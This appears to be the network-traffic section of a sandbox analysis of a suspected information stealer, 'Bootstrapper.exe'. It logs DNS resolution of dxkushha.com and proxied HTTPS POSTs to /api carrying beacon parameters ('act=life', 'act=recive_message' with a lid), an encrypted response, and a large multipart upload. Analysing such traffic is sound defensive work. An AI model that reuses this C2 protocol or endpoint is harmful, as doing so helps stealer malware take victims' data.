Dec 27, 2024 03:36:19.164522886 CET	49775	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:19.181529045 CET	49775	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:19.181544065 CET	443	49775	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:19.490066051 CET	49782	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:19.490087986 CET	443	49782	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:19.490151882 CET	49782	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:19.490386009 CET	49782	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:19.490397930 CET	443	49782	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:20.791572094 CET	443	49782	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:20.791685104 CET	49782	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:20.792674065 CET	49782	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:20.792684078 CET	443	49782	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:20.792882919 CET	443	49782	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:20.793917894 CET	49782	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:20.794111013 CET	49782	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:20.794142962 CET	443	49782	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:20.794207096 CET	49782	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:20.794214964 CET	443	49782	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:21.765541077 CET	443	49782	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:21.765647888 CET	443	49782	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:21.765716076 CET	49782	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:21.767008066 CET	49782	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:21.767015934 CET	443	49782	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:22.588867903 CET	49788	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:22.588895082 CET	443	49788	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:22.588977098 CET	49788	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:22.589574099 CET	49788	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:22.589586973 CET	443	49788	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:23.820698977 CET	443	49788	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:23.820776939 CET	49788	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:23.822348118 CET	49788	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:23.822355032 CET	443	49788	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:23.822551012 CET	443	49788	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:23.823663950 CET	49788	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:23.823782921 CET	49788	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:23.823786974 CET	443	49788	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:24.645350933 CET	443	49788	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:24.645418882 CET	443	49788	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:24.645467043 CET	49788	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:24.645558119 CET	49788	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:24.645570040 CET	443	49788	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:24.813879967 CET	49794	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:24.813946009 CET	443	49794	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:24.814002991 CET	49794	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:24.814529896 CET	49794	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:24.814548016 CET	443	49794	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:26.074498892 CET	443	49794	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:26.074729919 CET	49794	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:26.075849056 CET	49794	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:26.075872898 CET	443	49794	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:26.076087952 CET	443	49794	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:26.077210903 CET	49794	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:26.077281952 CET	49794	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:26.077294111 CET	443	49794	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:27.432431936 CET	443	49794	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:27.432523966 CET	443	49794	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:27.432589054 CET	49794	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:27.432765961 CET	49794	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:27.432805061 CET	443	49794	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:27.436784983 CET	49801	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:27.436822891 CET	443	49801	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:27.436912060 CET	49801	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:27.437256098 CET	49801	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:27.437271118 CET	443	49801	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:28.695382118 CET	443	49801	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:28.695447922 CET	49801	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:28.696613073 CET	49801	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:28.696623087 CET	443	49801	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:28.696841955 CET	443	49801	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:28.738255978 CET	49801	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:28.751827002 CET	49801	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:28.751838923 CET	49801	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:28.751887083 CET	443	49801	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:29.471983910 CET	443	49801	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:29.472055912 CET	443	49801	104.21.80.1	192.168.2.4
Dec 27, 2024 03:36:29.472292900 CET	49801	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:29.472292900 CET	49801	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:29.472352028 CET	49801	443	192.168.2.4	104.21.80.1
Dec 27, 2024 03:36:29.472364902 CET	443	49801	104.21.80.1	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 03:36:08.988554001 CET	62465	53	192.168.2.4	1.1.1.1
Dec 27, 2024 03:36:09.268695116 CET	53	62465	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 03:36:08.988554001 CET	192.168.2.4	1.1.1.1	0x1368	Standard query (0)	dxkushha.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 03:36:09.268695116 CET	1.1.1.1	192.168.2.4	0x1368	No error (0)	dxkushha.com	104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 03:36:09.268695116 CET	1.1.1.1	192.168.2.4	0x1368	No error (0)	dxkushha.com	104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 03:36:09.268695116 CET	1.1.1.1	192.168.2.4	0x1368	No error (0)	dxkushha.com	104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 03:36:09.268695116 CET	1.1.1.1	192.168.2.4	0x1368	No error (0)	dxkushha.com	104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 03:36:09.268695116 CET	1.1.1.1	192.168.2.4	0x1368	No error (0)	dxkushha.com	104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 03:36:09.268695116 CET	1.1.1.1	192.168.2.4	0x1368	No error (0)	dxkushha.com	104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 27, 2024 03:36:09.268695116 CET	1.1.1.1	192.168.2.4	0x1368	No error (0)	dxkushha.com	104.21.16.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dxkushha.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49753	104.21.80.1	443	5416	C:\Users\user\Desktop\Bootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 02:36:10 UTC	259	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: dxkushha.com
2024-12-27 02:36:10 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-27 02:36:11 UTC	1119	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 02:36:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=64a45e09t7vflc5ag5e19ptft3; expires=Mon, 21 Apr 2025 20:22:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kXksVLYyiGmpXiE6imAaOFBa2ELqD4%2F87sVZLaz4tVzQDNQXf4bKMGUw24TrJvzfVET2LRIX%2BZu8MWiiqOY5rqr%2F7cZp69VOUKkB8hkuAzwAeLUX6Mgtug0WDbECRME%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f85ebe85b5a43ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1762&rtt_var=686&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=903&delivery_rate=1564844&cwnd=230&unsent_bytes=0&cid=4736baba1e66607e&ts=794&x=0"
2024-12-27 02:36:11 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-27 02:36:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49759	104.21.80.1	443	5416	C:\Users\user\Desktop\Bootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 02:36:12 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: dxkushha.com
2024-12-27 02:36:12 UTC	86	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-12-27 02:36:13 UTC	1111	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 02:36:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=klbvph5tojd6k58sijbveilbrr; expires=Mon, 21 Apr 2025 20:22:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vlt7cOirSzagYGYKZX5LviUfaauamYOPc2yaP3UwvviJnmzoSHaGkTlV08Pj4IHnPBz0uxsaLqUXgg2bFZO8yQq0L0Em8qnhQihCJynfeHAlnvGta8qN640pmLAxgMc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f85ebf5fbd742d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1606&rtt_var=803&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4200&recv_bytes=982&delivery_rate=39736&cwnd=227&unsent_bytes=0&cid=61783f4edf5c016c&ts=884&x=0"
2024-12-27 02:36:13 UTC	258	IN	Data Raw: 34 36 63 0d 0a 67 5a 68 50 4a 62 57 2b 39 6c 6a 50 62 58 62 79 32 41 72 47 68 41 34 61 64 58 65 6f 64 39 73 52 6b 50 61 51 45 79 53 4f 30 58 6e 36 75 6a 6b 48 6a 34 72 61 65 72 77 49 56 4d 69 2b 61 36 72 33 61 7a 5a 58 46 73 78 56 34 58 66 78 6d 75 4e 32 43 4b 79 6e 46 4b 4f 69 4b 55 54 5a 7a 5a 4e 30 37 51 67 4f 30 4f 4a 52 76 61 5a 72 64 46 64 4e 69 68 4b 78 63 2f 47 61 38 6e 4a 50 34 61 45 56 34 76 41 6a 51 74 33 62 6c 54 79 75 41 52 75 58 76 57 2b 6e 37 6d 42 7a 47 42 2f 46 56 66 63 7a 39 59 79 79 4b 51 62 44 74 41 33 67 31 53 35 57 33 70 79 4c 64 4c 52 50 45 35 7a 36 4d 4f 54 6c 61 33 67 5a 45 63 77 63 73 33 6e 34 6b 76 4e 33 54 76 36 34 48 2b 6e 77 4c 55 48 63 30 5a 77 6f 6f 77 73 63 6e 4c 74 6c 70 36 59 69 4f 42 41 4e 69 6b 33 35 49 4d 43 58 34 32 Data Ascii: 46cgZhPJbW+9ljPbXby2ArGhA4adXeod9sRkPaQEySO0Xn6ujkHj4raerwIVMi+a6r3azZXFsxV4XfxmuN2CKynFKOiKUTZzZN07QgO0OJRvaZrdFdNihKxc/Ga8nJP4aEV4vAjQt3blTyuARuXvW+n7mBzGB/FVfcz9YyyKQbDtA3g1S5W3pyLdLRPE5z6MOTla3gZEcwcs3n4kvN3Tv64H+nwLUHc0ZwoowscnLtlp6YiOBANik35IMCX42
2024-12-27 02:36:13 UTC	881	IN	Data Raw: 61 4d 64 6f 2b 56 6a 58 70 66 62 6d 48 72 31 54 78 79 63 74 47 32 6e 36 57 74 35 46 77 66 46 46 62 70 37 2b 70 44 34 66 6b 6e 6a 76 52 48 6b 38 69 52 41 32 4e 75 63 50 4b 49 4d 56 4e 37 36 62 37 79 6d 4e 44 67 33 42 63 6b 57 72 58 37 6a 31 4f 30 2f 58 36 79 30 46 36 4f 69 62 55 48 5a 33 5a 6b 36 76 77 63 66 6d 37 39 36 72 2b 39 68 64 52 63 59 77 42 71 36 63 2f 57 65 2b 48 35 4d 36 4c 34 57 35 66 6f 74 42 35 6d 63 6b 79 4c 74 56 31 53 7a 76 33 69 6a 36 6e 6f 36 4c 56 58 56 57 36 41 7a 39 5a 69 79 4b 51 62 6b 74 68 6a 67 38 53 4a 45 33 39 65 47 4f 72 38 4a 47 5a 57 6f 62 71 48 6f 5a 6e 73 46 48 38 51 54 75 6e 72 35 6e 66 64 32 51 71 7a 39 57 2b 54 69 62 52 2b 58 2f 5a 6b 78 6f 51 55 44 6b 50 70 33 36 76 38 73 66 78 74 56 6b 6c 57 39 63 76 61 56 39 6e 39 49 Data Ascii: aMdo+VjXpfbmHr1TxyctG2n6Wt5FwfFFbp7+pD4fknjvRHk8iRA2NucPKIMVN76b7ymNDg3BckWrX7j1O0/X6y0F6OibUHZ3Zk6vwcfm796r+9hdRcYwBq6c/We+H5M6L4W5fotB5mckyLtV1Szv3ij6no6LVXVW6Az9ZiyKQbkthjg8SJE39eGOr8JGZWobqHoZnsFH8QTunr5nfd2Qqz9W+TibR+X/ZkxoQUDkPp36v8sfxtVklW9cvaV9n9I
2024-12-27 02:36:13 UTC	1369	IN	Data Raw: 33 65 61 30 0d 0a 64 68 6b 53 33 46 57 6d 50 65 76 55 39 58 30 47 74 50 4d 56 37 76 45 68 51 4e 37 64 6c 7a 71 6e 41 52 75 61 73 6d 43 6b 36 32 31 7a 48 78 50 48 48 72 5a 38 39 5a 7a 78 66 55 50 68 73 46 75 74 75 69 70 66 6c 34 54 55 48 36 4d 4d 42 59 48 34 58 61 66 6f 59 6e 38 42 56 64 56 62 6f 44 50 31 6d 4c 49 70 42 75 61 30 48 4f 66 33 4a 30 54 54 32 4a 6b 31 70 41 59 64 67 72 42 6b 71 76 52 68 63 68 49 62 78 68 43 32 63 2f 4f 56 2f 48 74 4e 72 50 31 62 35 4f 4a 74 48 35 66 7a 6d 53 71 2f 42 52 2b 42 2b 46 32 6e 36 47 4a 2f 41 56 58 56 57 36 41 7a 39 5a 69 79 4b 51 62 6e 74 52 66 76 2b 69 74 56 32 64 4f 47 4d 4c 38 4c 47 70 53 32 5a 71 33 72 59 33 30 46 45 63 6f 48 75 48 62 31 6d 76 39 6a 51 36 7a 39 57 2b 54 69 62 52 2b 58 35 71 41 39 76 52 34 54 30 Data Ascii: 3ea0dhkS3FWmPevU9X0GtPMV7vEhQN7dlzqnARuasmCk621zHxPHHrZ89ZzxfUPhsFutuipfl4TUH6MMBYH4XafoYn8BVdVboDP1mLIpBua0HOf3J0TT2Jk1pAYdgrBkqvRhchIbxhC2c/OV/HtNrP1b5OJtH5fzmSq/BR+B+F2n6GJ/AVXVW6Az9ZiyKQbntRfv+itV2dOGML8LGpS2Zq3rY30FEcoHuHb1mv9jQ6z9W+TibR+X5qA9vR4T0
2024-12-27 02:36:13 UTC	1369	IN	Data Raw: 6c 66 58 39 58 57 34 6f 62 76 33 4f 79 7a 4f 52 68 55 65 75 73 56 66 71 36 4b 6b 75 58 68 4e 51 77 76 77 6f 61 6c 4c 42 74 6f 4f 70 6d 65 42 49 48 77 68 4f 2b 66 2f 71 52 2f 58 64 44 34 62 51 51 34 4f 67 2f 52 4e 50 53 6d 48 72 6a 54 78 4f 49 2b 6a 44 6b 77 33 74 37 42 78 50 4a 56 61 59 39 36 39 54 31 66 51 61 30 38 78 76 74 39 69 5a 41 33 4e 65 51 50 71 30 43 48 35 36 30 59 61 6a 75 59 48 38 46 47 4d 38 64 73 33 72 33 6d 50 39 79 56 4f 2b 79 57 36 32 36 4b 6c 2b 58 68 4e 51 64 6e 6a 67 33 30 4b 55 6d 76 61 5a 72 64 46 64 4e 69 68 53 78 64 50 79 51 34 48 39 55 34 72 51 62 35 66 49 6c 51 4e 76 53 6d 69 69 6c 44 68 53 65 74 57 43 74 34 6d 31 38 45 78 6e 4e 56 66 63 7a 39 59 79 79 4b 51 62 45 73 41 48 35 75 41 4e 4d 31 39 75 45 4c 4c 5a 50 43 39 36 6a 4b 4b Data Ascii: lfX9XW4obv3OyzORhUeusVfq6KkuXhNQwvwoalLBtoOpmeBIHwhO+f/qR/XdD4bQQ4Og/RNPSmHrjTxOI+jDkw3t7BxPJVaY969T1fQa08xvt9iZA3NeQPq0CH560YajuYH8FGM8ds3r3mP9yVO+yW626Kl+XhNQdnjg30KUmvaZrdFdNihSxdPyQ4H9U4rQb5fIlQNvSmiilDhSetWCt4m18ExnNVfcz9YyyKQbEsAH5uANM19uELLZPC96jKK
2024-12-27 02:36:13 UTC	1369	IN	Data Raw: 57 51 79 4b 45 72 55 7a 71 74 54 2f 59 30 66 70 6f 52 2f 73 38 54 39 4d 30 64 79 52 4b 4b 6f 44 48 70 2b 35 59 4b 6e 6c 5a 47 6f 58 47 4d 6f 48 71 33 58 35 6d 72 49 2f 42 75 75 72 57 37 75 36 48 46 44 63 6e 49 74 30 74 45 38 54 6e 50 6f 77 35 4f 56 6d 64 52 6b 48 7a 68 4f 79 63 50 79 63 39 33 6c 43 35 72 34 55 36 50 41 6b 54 39 66 54 6b 54 4b 6d 43 52 71 52 76 47 53 70 70 69 49 34 45 41 32 4b 54 66 6c 55 36 4a 6e 30 5a 6c 66 5a 74 42 75 79 75 6a 49 4a 7a 70 79 54 4e 75 31 58 56 4a 32 32 59 71 6e 6a 61 48 41 51 46 73 73 5a 76 58 37 2f 6b 50 74 31 51 2f 36 68 48 65 33 36 49 6b 6e 59 30 49 59 30 71 41 38 59 30 50 51 6f 6f 2f 34 73 49 46 63 6b 33 52 58 35 62 4c 79 4e 73 6e 5a 4b 72 4f 74 62 37 50 63 2f 53 39 6a 63 6c 54 6d 70 42 42 4f 57 76 47 6d 6e 34 32 39 Data Ascii: WQyKErUzqtT/Y0fpoR/s8T9M0dyRKKoDHp+5YKnlZGoXGMoHq3X5mrI/BuurW7u6HFDcnIt0tE8TnPow5OVmdRkHzhOycPyc93lC5r4U6PAkT9fTkTKmCRqRvGSppiI4EA2KTflU6Jn0ZlfZtBuyujIJzpyTNu1XVJ22YqnjaHAQFssZvX7/kPt1Q/6hHe36IknY0IY0qA8Y0PQoo/4sIFck3RX5bLyNsnZKrOtb7Pc/S9jclTmpBBOWvGmn429
2024-12-27 02:36:13 UTC	1369	IN	Data Raw: 6b 33 35 65 50 71 62 34 48 52 50 35 4c 63 53 34 2f 34 6e 53 74 44 63 6b 54 65 6f 43 78 71 55 76 57 69 6f 36 57 74 77 47 42 48 4b 47 76 6b 39 73 70 50 71 4d 52 36 73 6b 78 44 31 32 79 4e 4d 78 5a 79 4c 64 4c 52 50 45 35 7a 36 4d 4f 54 6f 5a 58 6b 66 47 38 59 64 76 57 48 79 6e 2f 74 2b 52 2b 4f 7a 47 4f 4c 77 4a 56 58 52 33 4a 38 79 71 67 63 51 6e 71 68 70 71 36 59 69 4f 42 41 4e 69 6b 33 35 51 75 53 54 39 58 34 45 78 62 51 41 34 76 41 75 54 4e 75 63 69 33 53 30 54 78 4f 63 2b 6a 44 6b 36 32 42 31 45 77 66 47 46 62 6c 36 39 5a 37 67 66 6b 6e 68 73 42 76 6d 36 43 78 56 32 4e 65 52 4f 61 6b 41 47 35 79 79 59 75 53 6f 4c 48 38 50 56 5a 4a 56 6c 58 44 6a 6e 72 42 57 58 50 71 30 46 2f 4c 78 49 45 75 58 77 39 6f 6a 37 51 67 59 30 4f 49 6f 70 4f 64 68 61 68 49 55 Data Ascii: k35ePqb4HRP5LcS4/4nStDckTeoCxqUvWio6WtwGBHKGvk9spPqMR6skxD12yNMxZyLdLRPE5z6MOToZXkfG8YdvWHyn/t+R+OzGOLwJVXR3J8yqgcQnqhpq6YiOBANik35QuST9X4ExbQA4vAuTNuci3S0TxOc+jDk62B1EwfGFbl69Z7gfknhsBvm6CxV2NeROakAG5yyYuSoLH8PVZJVlXDjnrBWXPq0F/LxIEuXw9oj7QgY0OIopOdhahIU
2024-12-27 02:36:13 UTC	1369	IN	Data Raw: 50 6a 6b 2b 4d 78 48 76 71 6a 44 4f 54 6c 59 31 36 58 32 35 68 36 39 55 38 66 6e 37 52 6c 72 2b 4a 6c 66 52 38 57 7a 78 43 7a 66 2f 36 56 2b 6e 68 4d 36 62 59 64 36 66 6b 6a 53 4e 62 51 6b 44 4f 6a 42 6c 54 65 2b 6d 2b 38 70 6a 51 34 49 51 58 4e 44 62 52 6a 73 4b 62 78 59 46 66 35 76 67 76 6c 75 41 4a 45 32 39 2b 52 50 62 31 50 43 39 36 6a 4b 4b 50 71 4c 43 42 58 46 63 34 5a 75 6e 54 38 6d 2f 39 2b 51 65 65 38 45 65 33 6f 49 6b 4c 66 30 4a 77 33 76 77 55 65 67 72 4e 68 71 65 68 6b 61 68 52 56 68 46 57 2b 61 37 4c 4d 73 6b 4e 4d 37 37 38 4e 37 76 56 74 57 4a 6e 46 31 44 32 68 54 30 7a 51 71 48 71 6b 37 57 78 2f 47 51 66 4c 48 62 5a 35 38 70 4c 35 65 30 58 6c 74 78 58 71 2f 43 78 4b 31 74 32 55 50 36 30 47 42 70 33 36 4a 75 54 68 64 44 68 50 56 66 30 5a 73 Data Ascii: Pjk+MxHvqjDOTlY16X25h69U8fn7Rlr+JlfR8WzxCzf/6V+nhM6bYd6fkjSNbQkDOjBlTe+m+8pjQ4IQXNDbRjsKbxYFf5vgvluAJE29+RPb1PC96jKKPqLCBXFc4ZunT8m/9+Qee8Ee3oIkLf0Jw3vwUegrNhqehkahRVhFW+a7LMskNM778N7vVtWJnF1D2hT0zQqHqk7Wx/GQfLHbZ58pL5e0XltxXq/CxK1t2UP60GBp36JuThdDhPVf0Zs
2024-12-27 02:36:13 UTC	1369	IN	Data Raw: 69 50 77 62 6f 6f 6c 75 37 71 6e 38 63 67 6f 2f 44 61 76 38 51 57 6f 6e 36 66 75 53 2b 50 6a 5a 58 42 34 70 4e 2b 54 54 78 68 75 42 33 52 66 71 77 58 4e 33 45 44 55 7a 62 33 35 67 37 71 6b 39 61 30 4c 55 6f 2f 4e 38 73 65 77 55 48 68 51 53 76 66 75 4b 54 76 6e 6c 58 34 62 39 62 72 62 70 68 51 39 7a 51 6b 54 32 39 51 41 61 41 73 57 53 79 71 6d 68 71 56 31 75 4b 42 4c 4a 38 34 4a 72 31 50 6c 66 36 76 67 76 67 2f 79 6f 4c 33 38 32 5a 4e 75 31 42 56 49 57 78 5a 4b 4c 72 65 54 63 47 41 38 6b 44 76 6a 2f 36 68 66 39 39 42 74 50 39 57 2f 75 36 64 51 66 69 33 35 6f 30 71 68 6b 46 33 5a 70 6a 71 4f 56 67 65 52 42 56 68 46 57 2f 4d 36 72 48 76 44 46 43 2f 66 4e 44 73 36 68 32 45 6f 53 4c 78 47 69 79 51 51 33 51 72 43 6a 38 74 43 49 34 42 56 57 53 56 66 35 77 34 49 Data Ascii: iPwboolu7qn8cgo/Dav8QWon6fuS+PjZXB4pN+TTxhuB3RfqwXN3EDUzb35g7qk9a0LUo/N8sewUHhQSvfuKTvnlX4b9brbphQ9zQkT29QAaAsWSyqmhqV1uKBLJ84Jr1Plf6vgvg/yoL382ZNu1BVIWxZKLreTcGA8kDvj/6hf99BtP9W/u6dQfi35o0qhkF3ZpjqOVgeRBVhFW/M6rHvDFC/fNDs6h2EoSLxGiyQQ3QrCj8tCI4BVWSVf5w4I
2024-12-27 02:36:13 UTC	1369	IN	Data Raw: 37 36 45 4a 35 66 6b 37 52 4a 44 69 71 68 2b 67 41 68 47 65 76 56 61 61 78 32 5a 6f 47 68 72 4e 4b 34 64 45 34 35 50 69 4d 32 44 76 70 52 69 6a 74 47 31 66 6c 34 54 55 47 36 63 66 47 5a 2b 39 4b 4f 71 6d 61 44 68 50 56 65 38 59 74 48 62 38 6b 37 42 51 54 50 79 2b 46 4f 53 36 59 77 66 62 6e 4d 78 36 72 41 55 45 6e 62 56 76 36 4f 46 32 66 31 64 62 69 68 76 35 4b 37 4b 56 2b 47 46 4c 34 37 52 58 35 66 51 6a 42 38 69 53 6a 58 71 37 54 30 7a 44 39 43 69 32 70 6a 51 34 55 42 76 48 46 4c 70 39 38 59 62 67 64 30 58 36 73 46 7a 64 78 41 68 4b 32 74 6d 61 50 5a 4d 78 4e 5a 71 71 5a 61 76 68 4c 6c 67 51 41 38 6b 72 68 30 54 6a 6b 2b 49 7a 59 4f 2b 6c 47 4b 4f 30 62 56 2b 58 68 4e 51 62 70 78 38 5a 6e 37 30 71 68 4f 46 36 65 31 64 62 69 68 48 35 4b 37 4b 78 2f 33 78 Data Ascii: 76EJ5fk7RJDiqh+gAhGevVaax2ZoGhrNK4dE45PiM2DvpRijtG1fl4TUG6cfGZ+9KOqmaDhPVe8YtHb8k7BQTPy+FOS6YwfbnMx6rAUEnbVv6OF2f1dbihv5K7KV+GFL47RX5fQjB8iSjXq7T0zD9Ci2pjQ4UBvHFLp98Ybgd0X6sFzdxAhK2tmaPZMxNZqqZavhLlgQA8krh0Tjk+IzYO+lGKO0bV+XhNQbpx8Zn70qhOF6e1dbihH5K7Kx/3x

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49766	104.21.80.1	443	5416	C:\Users\user\Desktop\Bootstrapper.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 02:36:15 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=7HM2AQP1HV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18122 Host: dxkushha.com
